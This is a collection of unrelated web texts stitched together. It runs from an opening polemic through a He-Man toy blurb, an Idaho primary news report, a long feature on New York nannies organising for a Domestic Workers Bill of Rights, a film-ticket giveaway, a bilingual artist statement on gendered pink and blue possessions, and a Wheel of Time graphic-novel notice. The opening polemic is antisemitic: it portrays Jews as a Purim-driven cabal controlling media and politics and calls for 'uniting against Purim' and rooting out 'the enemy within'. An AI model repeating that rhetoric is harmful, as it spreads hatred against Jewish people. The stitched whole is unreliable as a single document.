Not a single leader in this country could convince the public that he had the talent , the integrity or even just a seed of true leadership .
But here is the news .
As much as our elected leaders are totally clueless , the Sabans , the Lord Levys and the Wolfowitzes know exactly what to do .
The Jewish religion , culture and ideology provides its followers with a narrative that saves us of the democratic limbo .
The Sabans of this world are far from being amateurs or clueless ; they know exactly what to do .
They have been doing it for three thousand years .
They are the followers of Mordechai and Esther .
The Sabans of the world know how to translate the moral of Purim into British and American practice .
Stuart Littlewood seems to wonder why Jews are over - represented .
With Purim in mind , we may be able to suggest an answer .
We are dealing here with an exilic cultural setting that preaches for lobbing , influence and control .
Shaping politics , media and thoughts is the true meaning of the Book of Esther .
Saban was either just genuine or foolish enough to admit it in public .
However , the absence of a Book of Esther within the heart of Muslim or Hindu culture may explain why other marginal migrant groups in Britain are adequately and proportionally represented in British politics and media .
Moreover , it is unlikely that this will change soon .
As opposed to most minorities and marginal identities in the West , Judaism is an exilic national religion and the Jewish identity is a product of tribal indoctrination .
This may explain why emancipated Jews who live in Britain for generations as seculars still operate within Jewish political and social settings , and under Jewish political banners .
It is not a secret that a few Jews out there are very gifted .
It is also rather obvious that some Jews are amongst the leading contributors to the humanist and universal discourse .
However , this is not something we can say about Haim Saban , who openly desires to influence American foreign policy by means of donations , think tanks and media control .
Similarly , David Milliband , who struggled to amend British universal Jurisdiction to make it easy for Israeli war criminal visit his kingdom , should not be regarded as a great humanist either .
Nick Cohen , who founded the Euston Manifesto , a think tank that promotes Zionist interests within British intellectual culture , cannot be regarded as an ethical icon .
Amazingly enough , they all did it in the open .
If we care about peace and about our future generations , we must be brave enough to connect the dots .
The Mordechais and Esthers within our media , intellectual and political life must be confronted .
We must unite against Purim .
If the Labour party still carries any ethical responsibility , it should put David Milliband in his place .
If our parties want us to believe in their agendas , they had better learn to say “ NO ” to Zionist money and Jewish proxy donators .
If our media outlets want us to believe in their ‘ impartiality ’ , they had better identify the enemy within .
How many Iraqis will need to die before the penny drops ?
How many peace activist should die in high seas before we all say ‘ NO more ’ ?
How many British workers will need to lose their jobs , homes and hopes before we can allow ourselves to say “ NO ” to Zionist wars and their advocates in our midst ?
﻿
The Terror Claws Strike !
D uring the annual Spring Celebration , King Randor is supposed to give away the Gem of Life to a farmer to help with their harvest .
Skeletor devises a scheme to steal the Gem in hopes that he can use it for his own evil purposes and destroy all of Eternia 's crops .
On the way , Skeletor makes a stop at Spikor 's to take his new weapon : the Terror Claws !
Meanwhile , Randor is just about to give the gem away when a farmer with an old and diseased appearance asks him to reconsider his decision , but turns into Skeletor and just takes the gem anyway .
Adam turns into He - Man while a white ( ? )
Sy - Klone preps the Laser Bolt .
He -Man travels to Snake Mountain and , after a brief battle with Skeletor , recovers the Gem and returns it the palace .
00076180
1986 , Series 5 .
Packaged with Terror Claws Skeletor .
( CNN ) -- A Republican congressional candidate in Idaho who was recruited by national Republicans and endorsed by Sarah Palin was defeated Tuesday in a primary election .
Idaho State Rep. Raul Labrador topped Vaughn Ward in the battle for the GOP nomination for Idaho's 1st Congressional District .
Ward , an Iraq war veteran who served as a state campaign coordinator for GOP Sen .
John McCain 's 2008 bid for the White House , was picked as a candidate for the National Republican Congressional Committee 's " Young Guns " program .
He greatly out - raised Labrador in the race for campaign cash , and Palin , the former Alaska governor and 2008 GOP vice presidential nominee who was born in Idaho , joined Ward at a rally last week .
But Ward apparently damaged his bid in recent weeks , allegedly plagiarizing from a speech President Barack Obama made at the 2004 Democratic convention .
He also mistakenly indicated that Puerto Rico was a country during a recent debate .
Labrador , a conservative favored by local Tea Party groups , will now face Democratic Rep. Walt Minnick in November 's general election .
Minnick , a freshman member of Congress who won the district by 2 percentage points in the 2008 election , was the only Democrat to receive an endorsement in April by the Tea Party Express , a national group that has organized three cross country bus tours .
The district covers the western part of Idaho , including parts of suburban Boise .
Photo : Sarah Wilmer
Every morning , the exodus of nannies begins before dawn .
They greet one another at the subway stop in Crown Heights or East Flatbush or Sunset Park , then board the train to Manhattan , fanning out across the borough to spend the next eight or ten or fourteen hours taking care of someone else ’s children .
Patricia Francois would ride the Q train from Flatbush to her workplace , a luxury apartment across from Carnegie Hall .
Her employers were a documentary filmmaker ( the husband ) and a prominent sports agent ( the wife ) .
A friend of a friend — a baby nurse — had told her about the job .
When she first met the parents , in 2002 , she was filled with the usual job - interview jitters .
Then she saw their 18 - month - old daughter .
“ If you saw the smile I got from that baby , ” she says .
“ I fell in love with her , and she fell in love with Pat . ”
The starting pay was n’t great — $ 500 a week for 50 hours of work — but Francois could n’t be too picky ; she had n’t worked in three months .
And this was much better than the first job she got after arriving from Trinidad six years earlier ; she ’d worked as a live - in nanny in Westchester , making just $ 300 a week .
The baby nurse had warned her that the husband was not easy to get along with , but Francois knew she ’d be spending her days with the girl , not him .
Some of the other nannies in the park might have had a better deal in terms of hours and pay , but in other ways she was convinced she had the better job .
“ I had a wonderful kid , ” she says .
Francois and the girl went everywhere together : to the playground , library , music class , play dates , the zoo .
One day , not long after she started , they were in Central Park when she noticed a newsletter lying on a bench .
It was from an organization she ’d never heard of : Domestic Workers United .
The headline — RESPECT ALL WORK — reminded her of something her father used to tell her back in Trinidad : “ Pat , respect yourself and others will respect you . ”
The newsletter mentioned an upcoming meeting at a church in Fort Greene .
Francois tucked the stapled pages into her pocketbook .
At the time , she never could have predicted that this single act would lead to her own political awakening — and that ultimately her entire life as a nanny would unravel .
There may be no more peculiar employer - employee relationship than the one that exists between parents and nannies .
A nanny ’s workplace is the boss ’s home , her salary negotiations taking place at the kitchen table .
Whether she likes it or not , she has a ringside seat to her employers ’ marital scuffles , housekeeping habits , financial ups and downs .
And when there are problems , there ’s no HR department to consult , not even a co-worker to vent with .
For parents , the arrangement is fraught with guilt and anxiety over leaving their children with another caregiver ; sometimes there is competition and jealousy between parents and nannies over a child ’s affections .
To complicate matters further , some parents do n’t like to think of themselves as bosses at all , preferring to think of the nanny as a “ member of the family . ”
The unsurprising outcome of all of this is an industry with few standards .
Inside a single apartment building , the work lives of nannies can vary wildly , from how much they ’re paid to what their duties are to whether their boss talks to them like a professional or a servant .
It used to be that the only place an unhappy nanny could find solace was the park bench , but ten years ago Domestic Workers United set out to change that .
One of the group ’s founders was Ai-jen Poo , the daughter of Chinese immigrants , who went to work for an Asian - American organization in the Bronx after graduating from Columbia in 1996 .
Before long , she met several Filipina nannies who had come to New York via Hong Kong — only to find that in some ways they were worse off here .
In Hong Kong , domestic workers labor under standard two - year contracts , which require employers to pay a minimum salary , provide days off , and cover their medical care .
In New York , some of these women were being paid less than minimum wage — one was making $ 700 a month .
“ Coming to the United States , where they expected freedom and democracy and everybody ’s rights being protected , they were really shocked to find domestic workers in New York had no standards and protections , ” says Poo .
She began meeting with the Filipina women to talk about how to improve their work conditions , then expanded her efforts to target Caribbean women , too , since they make up a large percentage of the city ’s nannies .
She and a few other organizers handed out flyers at Manhattan ’s busiest playgrounds , then held a meeting in a bookstore in Fort Greene in the fall of 1999 .
Ten women showed up , including Beverly Alleyne , a native of Barbados , who had been working as a nanny in New York since 1977 .
“ I was very impressed and overwhelmed , ” Alleyne recalls .
“ We had been in this country all this time and never had anyone told us about organizing . ”
Photo : Sarah Wilmer
Fear was one of the biggest obstacles in recruiting new members .
“ When I first tried to explain to the ladies in the park about coming to the meetings , they would always say , ‘ I ca n’t come because I do n’t want my employer to know , ’ ” says Alleyne .
“ I told them : ‘ What you do on weekends is your business . ’ ” Among those employers who did find out , reactions varied enormously :
A mother in Westchester overheard her nanny on the phone talking about the group and told her , “ If you do n’t have anything better to do with your time , you can come up here and work . ”
Meanwhile , on the Upper West Side , an employer took a pile of flyers and started distributing them to nannies herself .
Over the past ten years , the group has recruited some 3,000 women .
Most are nannies , the rest are housekeepers and elder - caregivers , and almost everyone is an immigrant .
The organization runs a nanny - training course ( with lessons on how to negotiate with your boss ) , and so far it ’s helped more than a dozen women sue their employers — for physical assault , sub - minimum - wage pay , failure to pay overtime .
Taking cases to court , however , is not their preferred strategy .
What they most want is for New York State to adopt its “ Domestic Workers Bill of Rights . ”
Throughout history , politicians have excluded domestic workers from federal and state labor laws .
President Roosevelt ’s federal minimum - wage proposal in 1937 sparked ads in magazines : “ Housewives beware !
If the Wages and Hours Bill goes through , you will have to pay your Negro girl eleven dollars a week . ”
To win the support of Southern Democrats in Congress , Roosevelt announced that the bill would n’t apply to “ domestic help . ”
The recession has been the ultimate recruiting tool .
nannies who ’ve been sacked without warning are primed to fight back .
Domestic workers have since come under the protection of minimum - wage laws , but there are still a number of standard benefits they are not guaranteed : sick days , holidays , paid vacation , severance .
Last week , the State Senate passed a bill that would provide for one day off a week , six paid holidays , seven sick days , five vacation days , and notice of termination .
It would also strengthen the rules about overtime pay .
( Although nannies are supposed to be subject to overtime laws , not all employers pay time and a half for extra hours worked . )
If this bill can be reconciled with one that passed the Assembly last year — and Governor Paterson signs it — New York will become the first state to enact a bill of rights for domestic workers .
The new law would cover all 200,000 domestic workers in the New York area — whether they work on the books or off , whether they are legal residents or not — giving them recourse if their employer disregards the rules .
Supporters believe it has the potential to alter dramatically the nanny - employer relationship .
The tenor of job negotiations changes when a nanny is not just asking for paid vacation time but pointing out that she is legally entitled to it .
No doubt there will be a period of adjustment and some employers who resist .
But considering the number of parents who post questions about how to treat their nannies on sites like Urban Baby — How much of a raise should I give my nanny ?
How should I let go of my nanny of five years ?— it ’s evident that many employers are trying to get this relationship right .
While the Bill of Rights does n’t stipulate wages , it will provide something that many parents seem to want : clarity .
Donna Schneiderman first heard about the Bill of Rights in 2008 , after an organizer from Jews for Racial and Economic Justice visited her daughter ’s Hebrew school in Park Slope .
She supports the bill , “ so that as employers we ’re not winging it . ”
Schneiderman has employed the same woman to care for her children for eleven years .
“ Yes , there will be an awkward transition for those of us who have been long - term employers , and there might be a financial impact for some people who may not have been paying vacation pay or who may not be paying for sick days , ” she says .
“ But I think the next wave of new parents will be better off for it .
That will be their new standard . ”
By the time Francois arrived at her first Domestic Workers United meeting in Fort Greene , the women had split into groups : Latina women speaking Spanish to one another , Caribbean women talking in English , West African women speaking French .
She joined the English speakers and listened .
Francois had come to New York alone and had no family here , but suddenly she felt as though she was surrounded by women who could be her sisters .
The camaraderie kept her coming back .
Occasionally , the group would hold protests to publicize a worker ’s allegations of abuse .
Francois went to rallies for Marina Lopez , a grandmother from Colombia , who filed a lawsuit accusing her boss of paying her less than $ 3 an hour to care for a disabled boy — and putting her sleeping quarters in a basement where raw sewage spilled onto the floor .
And she showed up at a rally for Angelica Hernandez , a housekeeper - nanny from Mexico , who alleged that her bosses paid her less than minimum wage and worked her around the clock in their Tribeca apartment .
After two Indonesian housekeepers were held as virtual slaves in Muttontown , Long Island — and their bosses were convicted in federal court — Francois joined a protest outside the courthouse too .
Photo : Sarah Wilmers
These women ’s stories made Francois feel like she should hold on to her own job as long as she could .
Most of the time she got along with her bosses , but there were moments when she felt they were n’t treating her fairly .
Sometimes , she says , they stayed out until 11 p.m. and did n’t pay her overtime .
She went with them to Florida for a week in 2004 and , she says , received no extra money for working fourteen - hour days .
When the girl started school in the fall of 2005 , her bosses cut her schedule almost in half .
Although they raised her hourly rate to $ 14 , her total pay took a huge hit .
The husband ’s behavior was also beginning to bother her .
He ’d come home and greet his daughter but not acknowledge Francois , she says , and he had a temper — she could hear him hollering into the telephone .
When he did speak to Francois , she felt like he was talking down to her .
“ I would always try to avoid him , ” she says .
“ I never liked being in the same space as him . ”
After she joined Domestic Workers United , her attitude toward her job started to change .
Once , she purposefully left a Domestic Workers United flyer about suggested wage rates in the girl ’s schoolbag for her employers to find .
And when the husband spoke to her in a way that she felt was disrespectful , she started telling him so .
“ After a while , ” she says , “ I stopped biting my lips . ”
As she became more assertive , she recalls , the transformation was obvious enough that one day he asked : “ Who ’s coaching you ? ”
She thought about quitting , but two things stopped her : fear of not having a job and her devotion to the girl .
“ She needed me as much as I needed that job . ”
These days , every time an investment banker or corporate lawyer or TV producer loses his or her job , a domestic worker stands a good chance of losing her job , too .
Inside the office of Domestic Workers United , the phones are busiest on Friday afternoons ; that ’s when nannies are most likely to get laid off , told not to come back on Monday .
The recession has proved to be the ultimate recruiting tool .
So many nannies have been sacked without warning that they are primed to fight back .
And for those who ca n’t find work , there are more hours to devote to the cause .
In recent months , this army of unemployed nannies has included Barbara Young , 62 , who is known in the group as “ The Mayor ” because of her gift for public speaking .
After seventeen years as a nanny , she knows well the cruel reality of the job :
No matter how gifted or experienced or devoted a nanny is , her charges will grow up and go to school , and suddenly she wo n’t be needed anymore .
The current version of the Bill of Rights requires employers to give two weeks ’ notice , but it is hard to imagine any legislative remedy that would ensure a smooth ending to such an emotional relationship .
For the past eight years , Young worked as a nanny for a young girl on the Upper West Side .
In January , she says , her employers told her they were having financial problems and wanted to reduce her schedule from five days a week to three .
Young balked .
She knew it would n’t be easy to find another part - time job to supplement her income .
For two weeks , she and her employers went back and forth on the matter .
Eventually , she says , she agreed to work the reduced schedule until she found something else .
Before that new schedule started , however , she learned from another nanny in the neighborhood that she ’d been replaced .
When she reached her boss on the phone , she heard the four words every nanny dreads :
We made other arrangements .
“ I said , ‘ So wait a minute : You made other arrangements ?
Are you firing me over the phone ? ’ ”
Young ’s former employer says that by the time she agreed to continue working for them , they had already hired someone else .
“ We tried to keep it going as long as we could , ” he says .
“ I wish there was n’t this feeling of unpleasantness , but I think it happens .
Have you ever lost your job ?
There ’s never a happy way of it happening . ”
People lose their jobs all the time , of course .
But from Young ’s point of view , the worst part was not getting to say a proper good - bye to the girl she had cared for .
Even with five children and thirteen grandkids of her own , she still spends a great deal of time thinking about this girl on the Upper West Side .
“ I had her from the time she was 6 weeks old , ” she says , lifting a tissue to her bloodshot eyes .
“ So we were very , very close . ”
For Patricia Francois , the evening of December 18 , 2008 , started like any other :
She prepared dinner in her employers ’ kitchen , bathed and fed their now - 8 - year - old daughter .
That day , the wife was out of town , she says , so when Francois heard the front door open around 6:30 p.m. , she knew it was the husband .
What happened next is a matter of fierce dispute — and the subject of a lawsuit now working its way through federal court .
In Francois ’s version of the story , the husband came home in a bad mood and began berating his daughter for not practicing her lines for a holiday skit .
Even after he took her to another room , Francois could hear the girl crying .
“ Mr. Matthew , stop it ! ” she shouted .
“ It ’s my child ! ” he said .
“ I do n’t care ! ” she said .
“ I ’m taking care of her too ! ”
She was about to leave when she overheard him tell his daughter she was going to have to do without her nanny from now on .
Hearing the girl ’s sobs , Francois went to comfort her , and that ’s when , she claims , things escalated .
According to Francois , her boss called her a “ stupid black bitch ” and told her he hoped she died “ a horrible death . ”
She shouted back and he slapped her , she claims .
When Francois tried to call 911 , he grabbed her hand and twisted it .
She fell , he lost his balance , too , and then he punched her in the torso and the face .
She struggled to get free and rushed out the door .
A doorman helped Francois down to the lobby , where she sat on a bench , tears streaking her face .
The police came and filled out a report , describing a bruise below her left eye and a bruise and cut on her left hand .
“ I was inclined to arrest him that evening , ” an officer later said in a deposition , “ but … Ms. Francois vehemently did not want to press charges at that time . ”
With the mother away , she was afraid the girl would wind up in the custody of child welfare if the father was arrested .
As the nanny became more assertive , her employer asked : “ Who ’s coaching you ? ”
A lawyer who lives in the building walked into the lobby and saw Francois .
“ My initial reaction [ was ] that this woman , poor woman , had been mugged out on the street , ” he later testified in a deposition .
He brought her up to his apartment , gave her a glass of water , then took her to the ER at Roosevelt Hospital .
Two days later , when Francois showed up at a Domestic Workers United meeting , she still had a black eye .
When she announced that it was her boss who had hit her , the room was stunned .
“ Let ’s go get him now ! ” shouted Deloris Wright , the 55 - year - old nanny who was running the meeting .
“ This man do n’t know what he did .
He just opened a can of worms . ”
The organization found a lawyer for Francois , and in 2009 , she filed a lawsuit against her former employers , Matthew Mazer and Sheryl Shade , accusing them of not paying overtime and him of assaulting her .
In court papers , Mazer and Shade have denied all of Francois ’s accusations and painted a very different picture of what occurred .
They contend that Francois was the aggressor , that she actually injured Mazer by “ punching him in the stomach , kicking him , choking him , placing her knee on his back , throwing him to the ground . ”
In addition , her former employers accused her of “ shouting obscenities and anti-Semitic remarks . ”
“ My client was not the assailant … He responded to what was initiated by her , ” says George D. Rosenbaum , a lawyer representing Francois ’s former employers .
“ My client has adamantly said he did nothing wrong . ”
Through their attorney , Mazer and Shade declined to be interviewed .
In the meantime , Francois ’s former employers have become the targets of Domestic Workers United protests .
One Sunday morning this past spring , some 30 women gathered on the sidewalk outside the family ’s apartment building on West 57th Street , marching in a circle , carrying signs , and chanting , “ Justice for Pat ! ”
As one speaker after another took the microphone , their complaints extended far beyond Francois ’s case .
“ We ’re here to say we ’re not going to take it anymore ! ”
“ We are not uneducated , stupid workers ! ”
“ We are raising a generation that is going on to Harvard and Yale , who may not even remember your name because you are an afterthought ! ”
Passersby could have been forgiven for assuming that all these women have terrible employers , but that ’s not entirely accurate .
“ I ’m with a wonderful family right now , ” says the event ’s emcee , Christine Lewis , who ’s been working for the same Upper West Side family for thirteen years .
In fact , she says she has never had a terrible employer .
“ You know why ? ” she says .
“ I would walk away . ”
Most of the leaders of Domestic Workers United are middle - aged Caribbean women who have been in New York for a decade or more .
They ’re less vulnerable to abuse than less - experienced nannies , but they have not forgotten what it was like to be new to the city and working fourteen or sixteen hours a day for minimal pay .
When they talk about the Bill of Rights , it ’s these women they focus on — new immigrants , underpaid and overworked , too scared to stand up for themselves .
It ’s been a year and a half since Francois stopped working for Matthew Mazer and Sheryl Shade , but in her mind the trauma of the incident is still very fresh .
In her home , she still displays photographs of their daughter .
“ I love that little girl , ” says Francois .
“ I still love her . ” A Snapfish photo album the family made for her in 2008 rests on a shelf .
Inside , a photo caption hints at how they once saw themselves : “ Pat ’s Second Family . ”
Francois , now 51 , has no kids of her own and lives alone in a tidy apartment just off Flatbush Avenue .
In her living room , she ’s surrounded by evidence of her political awakening : Malcolm X stares down from one wall ; a small U.S. flag , a souvenir from an immigration rally , leans against the windowsill ; a poster propped up in the corner features a quote from Martin Luther King Jr. : “ Injustice anywhere is a threat to justice everywhere . ”
She walks into the kitchen , settles into a chair , and hits the play button on her answering machine .
She has kept a series of voice mails chronicling the aftermath of the incident — evidence of an intense relationship gone horribly awry .
The father : “ Hi , Pat .
It ’s me calling .
[ Our daughter ] misses you terribly …
If you could please give her a call , I think it would perk all of us up and begin part of the spirit of reconciliation I think the new year warrants and we all deserve — you and she most of all . ”
The mother : “ Hey , Pat … Still have n’t heard from you .
I ’m wondering how you ’re doing …
Are you coming back ? …
Please call me at some point and let me know .
Talk to you .
Love you . ”
The daughter : “ Hi , Pat , it ’s me .
Just wanted to say hi and please , please , I really miss you …
My mom and my dad have changed .
My dad has been praying for you to come back and my mom really misses you .
And I do , too … Bye - bye . ”
As the familiar voices fill the room , Francois hugs her knees to her chest .
When she hears the voice of the girl , she becomes visibly distressed , closing her eyes and exhaling loudly .
The father : “ Hello , could you please give us a call .
It ’s important … that we talk .
We ’ve tried to talk to you before .
Please give us a call .
Out of mercy ’s sake .
Thank you . ”
The mother : “ Hey , Pat … Um . I really need to talk to you .
Because of this , uh , my whole life is coming down .
Um , and I just … I just need you to talk to me , ’ cause I do n’t know what to do and I do n’t know what you want .
And I thought you were my friend … I ’m just … I ’m so confused … Please do call if you can .
Thanks . ”
By the time the last voice mail ends , twelve minutes have passed and Francois looks utterly spent .
“ I ’ve been victimized and humiliated , ” she says .
“ I ’m a human too . ” A tear slides down her cheek .
“ This man really hurt me . ”
After fourteen years as a domestic worker , Francois has little to show for her efforts .
No savings , no job , no leads .
In recent days , though , she ’s had reason to feel optimistic .
Over the past six years , she ’s made some 25 trips to Albany to lobby for the Bill of Rights .
When the State Senate passed it last week , she was looking down from the balcony , tears in her eyes .
“ It will be reversing decades and decades and decades of injustice , ” she says .
Now she had something to show for her years of hard work , something more than the photographs of the children she helped raise .
Post Thumb : / oct12/7pps.jpg
In the mood for a bloodbath of carnage revolving around a kidnapped dog , several serial killers , numerous hit men , and the enigma that is Colin Farrell ’s eyebrows and the mystery that they represent ?
If you ’re in San Diego , you can see an advance screening of the flick on us !
The first five people to send an E - MAIL HERE will each get a pair of tickets to the Monday , October 8th , early screening of Martin McDonagh ’s highly anticipated Seven Psychopaths ( review ) !
The event starts at 7:00 pm PT at the AMC Mission Valley Theatre .
If you are one of the first five , you ’ll receive a confirmation e-mail asap .
Good luck !
Related Story : Contact One of the Seven Psychopaths
Abbie Cornish , Christopher Walken , Colin Farrell , Tom Waits , and Sam Rockwell star !
Synopsis
A struggling screenwriter inadvertently becomes entangled in the Los Angeles criminal underworld after his oddball friends kidnap a gangster ’s beloved Shih Tzu .
VISIT THE EVILSHOP @ AMAZON !
Got news ?
Click here to submit it !
Help a nut in the comments section below .
SeoWoo and Her Pink Things 2006 Jake and His Blue Things 2006 SeoWoo and Her Pink Things2 2008 Yeachan and His Blue Things 2005 Dayeun and Her Pink Things 2007 Thomas and His Blue Things 2006 Lauren & Carolyn and Their Pink Things 2006 Alexandra and Her Pink Things 2006 Seunghyuk and His Blue Things 2007 Tess and Her Pink & Purple Things 2006 Terry and His Blue Things 2005 Yealin Yang and Her Pink Things 2005 Seyoon and His Blue Things 2007 Yealin Ham and Her Pink Things 2005 Steve and His Blue Things 2006 Maia and Her Pink Things 2006 Kihun and His Blue Things 2007 Emily and Her Pink Things 2005 Jimin and His Blue Things 2007 Celine and Her Pink Things 2005 Joohun and His Blue Things 2007 Kara - Dayeoun and Her Pink Things 2008 Kevin-Donghu and His Blue Things 2008 Jiwoo and Her Pink Things 2007 Kevin and His Blue Things 2005 Avery and Her Pink & Purple Things 2006 Seungwoo and His Blue Things 2007 Jeeyoo and Her Pink Things 2008 Jeonghoon and His Blue Things 2008 Songmi & Gayoung and Their Pink Things 2007 Cole and His Blue Things 2006 Seohyun and Her Pink Things 2007 Michael and His Blue Things 2006 Jiseon and Her Pink Things 2008 Seokjune and His Blue Things 2005 Yehyun and Her Pink Things 2005 Yoon and His Blue Things 2005 Jiyeon and Her Pink Things 2007 Woojea and His Blue Things 2007 Sehyun and Her Pink Things 2007 Hojun and His Blue Things 2007 Yerim and Her Pink Things 2005 Haewook and His Blue Things 2007 Yujin and Her Pink Things 2007 Sunjae & Seungjae and Their Blue Things 2008 Sean Kelly and Her Pink Things 2006 Sojung and Her Pink Things 2005 Lola and Her Pink & Purple Things 2006 Noelle and Her Pink & Purple Things 2006 Soyoun and Her Pink & Purple Things 2005 Yehjin and Her Pink Things 2005 Mirai and Her Pink Things 2005 Samantha and Her Pink Things 2006
My current work , The Pink and Blue Projects are the topic of my thesis .
This project explores the trends in cultural preferences and the differences in the tastes of children ( and their parents ) from diverse cultures , ethnic groups as well as gender socialization and identity .
The work also raises other issues , such as the relationship between gender and consumerism , urbanization , the globalization of consumerism and the new capitalism .
The Pink and Blue Projects were initiated by my five - year - old daughter , who loves the color pink so much that she wanted to wear only pink clothes and play with only pink toys and objects .
I discovered that my daughter ’s case was not unusual .
In the United States , South Korea and elsewhere , most young girls love pink clothing , accessories and toys .
This phenomenon is widespread among children of various ethnic groups regardless of their cultural backgrounds .
Perhaps it is the influence of pervasive commercial advertisements aimed at little girls and their parents , such as the universally popular Barbie and Hello Kitty merchandise that has developed into a modern trend .
Girls train subconsciously and unconsciously to wear the color pink in order to look feminine .
Pink was once a color associated with masculinity , considered to be a watered down red and held the power associated with that color .
In 1914 , The Sunday Sentinel , an American newspaper , advised mothers to “ use pink for the boy and blue for the girl , if you are a follower of convention . ”
The change to pink for girls and blue for boys happened in America and elsewhere only after World War II .
As modern society entered twentieth century political correctness , the concept of gender equality emerged and , as a result , reversed the perspective on the colors associated with each gender as well as the superficial connections that attached to them .
Today , with the effects of advertising on consumer preferences , these color customs are a worldwide standard .
The saccharine , confectionary pink objects that fill my images of little girls and their accessories reveal a pervasive and culturally manipulated expression of femininity ” and a desire to be seen .
To make these images , I arrange and display the cotton - candy colored belongings of several children in their rooms .
When I began producing the pink images , I became aware of the fact that many boys have a lot of blue possessions .
Customers are directed to buy blue items for boys and pink for girls .
In the case of my eleven - year - old son , even though he does not seem to particularly like the color blue over other colors , whenever we shop for his clothes , the clothes he chooses are from the many - hued blue selection .
The clothes and toy sections for children are already divided into pinks for girls and blues for boys .
Their accessories and toys follow suit .
The differences between girls ’ objects and boys ’ objects are also divided and affect their thinking and behavioral patterns .
Many toys and books for girls are pink , purple , or red , and are related to make up , dress up , cooking , and domestic affairs .
However , most toys and books for boys are made from the different shades of blue and ?
are related to robots , industry , science , dinosaurs , etc .
This is a phenomenon as intense as the Barbie craze .
Manufacturers produce anthropomorphic ponies that have the characteristics of young girls .
They have barrettes , combs and accessories , and the girls adorn and make up the ponies .
These kinds of divided guidelines for the two genders deeply affect children ’s gender group identification and social learning .
As girls grow older , their taste for pink changes .
Until about 2nd grade , they are very obsessed with the color pink , but around 3rd or 4th grade , they do not obsess with pink as much anymore .
Usually , their tastes change to purple .
Later , there is another shift .
However , the original association with the color - code often remains .
본 ‘핑크 & 블루 프로젝트'는 핑크색을 너무나 좋아해서 , 언제나 핑크색 옷을 입고 , 핑크색 장난감만을 사길 원하는 나의 다섯 살 된 딸아이로 인해 처음 시작 되었다 .
분홍색만 좋아하는 딸의 취향은 그리 특별한 것이 아니다 .
한국과 미국 그리고 어디서나 , 많은 어린 여자 어린이들은 핑크색 옷 , 액세서리와 장난감들을 너무나 좋아한다 .
이러한 현상은 그 어린이들의 문화적 배경이 다름에도 불구하고 , 다양한 인종의 어린이들에게 널리 퍼진 현상이다 .
이것은 어린 아이들과 그들의 부모들을 겨냥한 , 모던 트렌드로 발전한 일반적으로 유명한 바비와 헬로우 키티 등의 제품들과 같은 상업적인 광고의 영향인 것으로 생각했다 .
제 1 차 세계대전 이전 , 핑크색은 연한 빨간색으로 , 한때 사내다움 ( 남자다움 ) 과 관계 있었던 색깔이었다 .
1914 년 미국 신문 ‘ The Sunday Sentinel ' 에서는 , 부모들에게 “ 만약 , 당신이 이 시대의 관습을 따르려면 , 남자 어린이들에게는 핑크색을 , 여자 어린이들에게는 파란색을 사용하도록 하라'고 말하고 있다 .
겨우 세계 제 2 차 세계대전 후에야 비로소 미국과 다른 지역에서 , 소녀들을 위해서는 핑크색을 , 소년들을 위해서는 파란색을 주는 젠더에 따른 색의 변화가 일어났다 .
현대사회가 20 세기의 정치적인 올바름에 들어서면서 , 젠더에 따른 평등성의 개념이 일어나면서 , 그 결과 , 그 안의 있던 피상적인 관계뿐만 아니라 , 각 젠더에 따른 색깔에 대한 관점의 변화가 역전되었다 .
당분이 많아 보이는 , 설탕에 절인듯한 핑크색로 가득찬 액세서리과 작은 소녀들로 보여지는 ‘ 핑크 프로젝트 ' 이미지들은 만연화되고 문화적으로 조정된 표현인 ‘ femininity ( 여성성 ) ' 와 그렇게 보여지기를 원하는 무의식적 욕망의 표현이다 .
나는 이 이미지들을 만들기 위해서 , 여러 어린이들의 방에서 그 어린이들의 솜사탕 같은 색깔의 물건들을 가지런히 진열했다 .
처음 이 핑크 이미지들을 만들기 시작하면서 , 한편으로 , 많은 남자 어린이들의 경우 , 수많은 파란색 물건들을 갖고 있다는 사실을 알게 되었다 .
소비자들은 남자 어린이들을 위해서는 파란색 물건들을 , 여자 어린이들을 위해서는 핑크 물건들을 사도록 유도된다 .
나의 14 살 된 아들의 경우 , 특별히 파란색이나 다른 색깔을 좋아하지 않아보이는데도 불구하고 , 우리가 같이 옷을 사러 갈 때마다 , 파란색 계통의 물건들을 사게 된다 .
어린이들을 위한 옷과 장난감 섹션은 이미 남자 어린이들을 위해서는 파란색 계통으로 , 여자 어린이들을 위해서는 핑크색 계통으로 나눠져 있다 .
그들의 액세서리와 장난감은 옷 색깔에 따르는 경우가 많다 .
여자 어린이들의 물건들과 남자 어린이들의 물건들은 이미 나눠져 있고 , 그들의 사고와 행동패턴에 영향을 미친다 .
여자 어린이들을 위한 많은 장난감들과 책들은 핑크색 , 보라색 또는 빨간색 계통의 것들이 많고 , 대부분 , 그것들은 화장 , 옷 입는 것 , 요리 , 그리고 집안 일들과 관계가 있다 .
반면 , 남자 어린이들을 위한 다양한 농담의 색조로 만들어진 파란색 장난감과 책들은 대부분 , 로보트 , 산업 , 과학적인 것 , 공룡 등과 관계가 있다 .
이러한 현상은 “ 바 비( Barbie ) ” 에 대한 열광 만큼이나 강렬한 것이다 .
심지어 , 바비사에서 나오는 작은 포니 장난감들은 어린 소녀들의 특성을 갖고 있다 .
그것들은 막대모양의 머리핀 , 빗 그리고 악세사리들을 가지고 있고 , 소녀들은 그 포니들을 치장하고 , 화장시킨다 .
이처럼 두 젠더에 따라 나뉘어진 가이드라인은 어린이들의 성 정체성과 사회성 체득 등에 깊게 영향을 미친다 .
여자 어린이들은 나이가 들어가면서 핑크색에 대한 취향이 변하기 시작한다 .
약 2학년 정도까지는 핑크색에 완전히 중독된 어린이들이 많다.
그러나 , 3학년 , 4 학년으로 올라갈수록 그들은 더 이상 핑크색을 그 전처럼 강박적으로 좋아하지 않는다 .
많은 어린이들의 경우 , 그들의 취향은 보라색이나 하늘색으로 변하는 경우가 많고 , 점점 , 다른 색깔을 좋아하는 것으로 색깔에 대한 선호가 바뀌기 시작한다 .
하지만 , 여전히 근본적인 젠더에 따른 칼라코드의 잔재는 남아있다 .
윤정미 , < 핑크 & 블루 프로젝트 > 중에서
Spotted on the Dynamite forums : Amazon has New Spring : The Graphic Novel available for preorder , with a release date of January 18 , 2011 .
They ’re using the cover from the prose novel in the listing , which I assume means
Tor has n’t submitted a cover yet .
I ’d say the cover from issue # 1 of the comic book ( shown here ) would work just fine .
It ’s taken a long time ( and three publishers ) to complete this adaptation of the Wheel of Time prequel , even though it only covered eight standard - sized comic books .
( Check out the New Spring - tagged posts here for the whole story . )
I ’m sure Tor Publishing was frustrated , since they could n’t actually release the collection until the individual chapters were complete , and Robert Jordan was extremely frustrated with the situation .
The same studio has also started adapting the main series .
